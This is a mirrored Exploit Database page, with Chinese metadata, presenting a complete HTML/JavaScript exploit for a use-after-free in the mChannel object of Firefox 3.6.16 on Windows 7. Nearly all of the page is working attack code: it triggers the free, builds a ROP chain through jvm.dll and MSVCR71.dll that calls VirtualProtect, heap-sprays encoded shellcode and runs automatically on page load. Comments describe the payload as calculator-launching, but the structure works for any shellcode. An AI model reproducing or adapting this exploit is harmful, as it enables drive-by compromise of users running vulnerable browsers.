Mozilla Firefox 3.6.16 (Windows 7) – mChannel Object Use-After-Free

• Exploit Database
• 152 阅读

• 作者： mr_me
  日期： 2011-08-16
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17672/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153

  <html> <body> <applet code="rubik.class" width=140 height=140></applet> <p><b>Mozilla mChannel Object use after free</b><br /> - Found by regenrecht<br /> - MSF exploit by Rh0<br /> - Win 7 fun version by mr_me</p> <!-- Notes:   - This exploit requires <= java 6 update 25. - optimized heap spray and still works on mutiple tabs as the spray is large enough to hit the 0x10000000 block. - If you really want the class file you can get it here: http://javaboutique.internet.com/Rubik/rubik.class, but java still loads without it. - Tested on windows 7 ultimate (latest updates). - http://bit.ly/qD4Jkc   --> <object id="d"><object> <script type="text/javascript"> function trigger(){ alert(&apos;ready?&apos;); fakeobject = document.getElementById("d"); // allocate the object fakeobject.QueryInterface(Components.interfaces.nsIChannelEventSink); // append to the objects available functions fakeobject.onChannelRedirect(null,new Object,0); // free it   /* fill the object with a fake vtable reference just use the start of a block for simplicity and use \x00 because it expands to a NULL so that when we have have the CALL DWORD PTR DS:[ECX+18], it will point to 0x10000000 */ fakevtable = unescape("\x00%u1000"); var rop = "";   // 3 instructions to pivot cleanly rop += unescape("%u1033%u6d7f"); // 0x6D7F1033 -> MOV EAX,[ECX] / PUSH EDI / CALL [EAX+4] <jvm.dll> rop += unescape("%u10a7%u6d7f"); // 0x6D7F10A7 -> POP EBP / RETN <jvm.dll> rop += unescape("%u1441%u6d7f"); // 0x6D7F1441 -> XCHG EAX,ESP / RETN <jvm.dll>   // generic rop taken from MSVCR71.dll (thanks to corelanc0d3r) rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN rop += unescape("%ua140%u7c37"); // 0x7c37a140 -> Make EAX readable rop += unescape("%u591f%u7c37"); // 0x7c37591f -> PUSH ESP / ... / POP ECX / POP EBP / RETN rop += unescape("%uf004%ubeef"); // 0x41414141 -> EBP (filler) rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN rop += unescape("%ua140%u7c37"); // 0x7c37a140 -> *&VirtualProtect() rop += unescape("%u30ea%u7c35"); // 0x7c3530ea -> MOV EAX,[EAX] / RETN rop += unescape("%u6c0b%u7c34"); // 0x7c346c0b -> Slide, so next gadget would write to correct stack location rop += unescape("%u6069%u7c37"); // 0x7c376069 -> MOV [ECX+1C],EAX / POP EDI / POP ESI / POP EBX / RETN rop += unescape("%uf00d%ubeef"); // 0x41414141 -> EDI (filler) rop += unescape("%uf00d%ubeef"); // 0x41414141 -> will be patched at runtime (VP), then picked up into ESI rop += unescape("%uf00d%ubeef"); // 0x41414141 -> EBX (filler) rop += unescape("%u6402%u7c37"); // 0x7c376402 -> POP EBP / RETN rop += unescape("%u5c30%u7c34"); // 0x7c345c30 -> ptr to &apos;push esp / ret &apos; rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN rop += unescape("%udfff%uffff"); // 0xfffffdff -> size 0x00000201 -> ebx, modify if needed rop += unescape("%u1e05%u7c35"); // 0x7c351e05 -> NEG EAX / RETN rop += unescape("%u4901%u7c35"); // 0x7c354901 -> POP EBX / RETN rop += unescape("%uffff%uffff"); // 0xffffffff -> pop value into ebx rop += unescape("%u5255%u7c34"); // 0x7c345255 -> INC EBX / FPATAN / RETN rop += unescape("%u2174%u7c35"); // 0x7c352174 -> ADD EBX,EAX / XOR EAX,EAX / INC EAX / RETN rop += unescape("%ud201%u7c34"); // 0x7c34d201 -> POP ECX / RETN rop += unescape("%ub001%u7c38"); // 0x7c38b001 -> RW pointer (lpOldProtect) (-> ecx) rop += unescape("%ub8d7%u7c34"); // 0x7c34b8d7 -> POP EDI / RETN rop += unescape("%ub8d8%u7c34"); // 0x7c34b8d8 -> ROP NOP (-> edi) rop += unescape("%u4f87%u7c34"); // 0x7c344f87 -> POP EDX / RETN rop += unescape("%uffc0%uffff"); // 0xffffffc0 -> value to negate, target value : 0x00000040, target: edx rop += unescape("%u1eb1%u7c35"); // 0x7c351eb1 -> NEG EDX / RETN rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN rop += unescape("%u9090%u9090"); // 0x90909090 -> NOPS (-> eax) rop += unescape("%u8c81%u7c37"); // 0x7c378c81 -> PUSHAD / ADD AL,0EF / RETN   sc = rop; // nice big &apos;calccode&apos; (0x400 bytes) sc += unescape("%uf869%u0d93%u3578%u7704%u902d%u432c%u249f%uba46%u983c%ub299%ufe13%uf9c0"+ "%u784f%u2f7c%u4fa9%u7a76%ub235%u7027%u2f73%ub937%ud380%u0de3%u157f%u93b5%ubfba%u4291"+ "%ufc03%u3d40%u729f%u9b24%u7e7b%u3814%u8dfd%u2592%u892c%u01e0%uf9d0%u41b1%uf731%u75e1"+ "%ubb3f%u7d79%uf811%u6734%u992d%u4b49%u6690%u71b4%ua847%u094a%u05eb%u4eb3%ud119%u3ae2"+ "%u0cd6%u96be%ub0b8%u4697%u98b7%u1048%ub6d5%u1c04%uf56b%u201d%u74d4%u773c%u727f%u7b7d"+ "%u7e7c%u7571%u9743%u1c49%ubb90%u4e74%u3cb5%ua993%ub09f%u73ba%ud522%u8d4f%u98be%u3304"+ "%u88f5%u43d4%u92b4%u7ab8%ud60a%u1da8%ub14a%uf82a%ub7b2%u2c41%u3b79%u05fd%u85b9%u76e0"+ "%ufc1a%u4b35%u9647%u8134%u24e1%u8366%u48e3%u4214%u870c%uebd2%u3f78%u9bb3%uff1b%uc1c7"+ "%u67e2%u910d%u70b6%u4615%u2d25%u772f%u993d%ubf27%u1240%u37f9%u7a77%u7279%u9167%u2f76"+ "%ubeb5%u15b6%u7d7f%u303f%u40e3%u11b7%u19e0%u39e2%u04fc%ua8ba%u991d%ud518%u41bb%u78bf"+ "%u9834%ub8b4%u270d%u8390%u4ffd%u31b1%u70e1%u4349%u86b3%u9ff5%u331c%ud6f7%u667e%ua93c"+ "%u9b8d%uf687%u46d4%u4293%u7314%u3d35%u257b%u4a97%u37b0%u2496%u4b74%u2c75%u92b9%u2d7c"+ "%u4748%u694e%uebd3%uf829%u08b2%u71f9%u790c%u717a%u227b%u05e2%u3cb8%u9fb6%u7896%uf903"+ "%u217e%ubfd6%u4e91%u3db3%u777c%u0d76%u7372%u1541%ub2ba%u342c%u9048%ud484%ue189%u4f05"+ "%u677f%ubbb9%u4370%u7d74%u1c75%ua92d%u1342%u93f5%u090c%u12e3%u92f8%u662f%u49b0%u8d99"+ "%ub44b%uc688%uebc0%u474a%u2b37%u46fc%u0a9b%u04fd%ue086%u2740%ua8be%u35b5%u3f97%u24b1"+ "%u1498%u25b7%u7c1d%u0b7f%ub1d5%u410c%u1047%u7deb%ue228%u7672%u7e78%u7177%u1b73%ufdd0"+ "%u3bb2%u3ce0%u7515%u4e25%uf52a%u70b9%u3540%u9993%ubf2c%u85b5%u79fc%u3474%u377b%ud26b"+ "%ubed5%u982d%ue33a%u9243%u7a14%ub33d%u9048%ubb8d%u9b24%u2f46%u20b0%uf9d1%ub897%ua866"+ "%ub4b7%ua996%ub642%ue180%u4a27%u1a77%u9fd4%u017e%u18eb%u8cf8%ubad6%u1c7c%u497f%u7467"+ "%u784f%u914b%u3271%u04e0%u0d7a%u1d79%u397b%ue2c1%u7d05%u933f%u70b1%ub324%u3cb8%u6642"+ "%u961c%u9b27%u72bf%ue338%ub53d%u3040%ub4fc%u7646%uf525%u029f%ubad5%u0cf8%u3fa9%u7514"+ "%ubb0d%u23e1%ub9d6%u05d4%u378d%ub243%ub735%u1573%u4798%u2c48%ua84b%ufd41%u4f2d%u1db6"+ "%u9049%uf981%ube04%u3491%u924e%ub097%u2f4a%u9967%u8dbe%u5994%udbe7%ud9da%u2474%u58f4"+ "%uc929%u33b1%u7031%u8312%u04c0%ufd03%ubb9a%u0112%ub24a%uf9dd%ua58b%u1c54%uf7ba%u5503"+ "%uc7ef%u3b40%ua31c%uaf05%uc197%uc081%u6f10%ueff4%u41a1%ua338%uc362%ub9c4%u23b6%u72f4"+ "%u22cb%u6e31%u7624%ue5ea%u6797%ubb9f%u892b%ub04f%uf114%u06ea%u4be0%u56f4%uc759%u4ebe"+ "%u8fd1%u6f1e%ucc36%u2663%u2733%ub917%u7995%u88d8%ud6d9%u25e7%u27d4%u812f%u5207%uf25b"+ "%u65ba%u8998%ue360%u293d%u53e2%uc8e6%u0527%uc66d%u418c%uca29%u8513%uf641%u2898%u7f86"+ "%u0eda%u2402%u2fb8%u8013%u4f6f%u6c43%uf5cf%u9e0f%u8f04%uf44d%u1ddb%ub1e8%u1ddc%u91f3"+ "%u2cb4%u7e78%ub0c2%u3bab%ufb3c%u6df6%ua2d5%u2c62%u54b8%u7259%ud6c5%u0a68%uc632%u0f18"+ "%u407e%u7df0%u25ef%ud2f6%u6c10%ub595%uec82%u5074%u9623%u4188");   // create a string with a ptr to the offset of our rop // used 0x1000001c to accomidate 0x18 + 0x4 (1st rop gadget) var filler = unescape("%u001c%u1000"); while(filler.length < 0x100) {filler += filler;}   /* create a string with 0x18 bytes at the start containing ptr&apos;s to the rop. This is to account for the vtable offset (0x18) -> &apos;CALL DWORD PTR DS:[ECX+18]&apos; Then fill with sc + junk */ var chunk = filler.substring(0,0x18/2); chunk += sc; chunk += filler;   // create a string of size 64k in memory that contains sc + filler var heapblock = chunk.substring(0,0x10000/2); // keep adding more memory that contains sc + filler to reach 512kB while (heapblock.length<0x80000) {heapblock += heapblock;}   /* using a final string of 512kB so that the spray is fast but ensuring accuracy - sub the block header length (0x24) - sub 1/4 of a page for sc (0x400) - sub the string length (0x04) - sub the null byte terminator */ var finalspray = heapblock.substring(0,0x80000 - sc.length - 0x24/2 - 0x4/2 - 0x2/2);   // optimised spray, precision can still be reliable even with tabs. // force allocation here of 128 blocks, using only 64MB of memory, speeeeeeed. arrayOfHeapBlocks = new Array() for (n=0;n<0x80;n++){ arrayOfHeapBlocks[n] = finalspray + sc; } } trigger(); </script> </body> </html>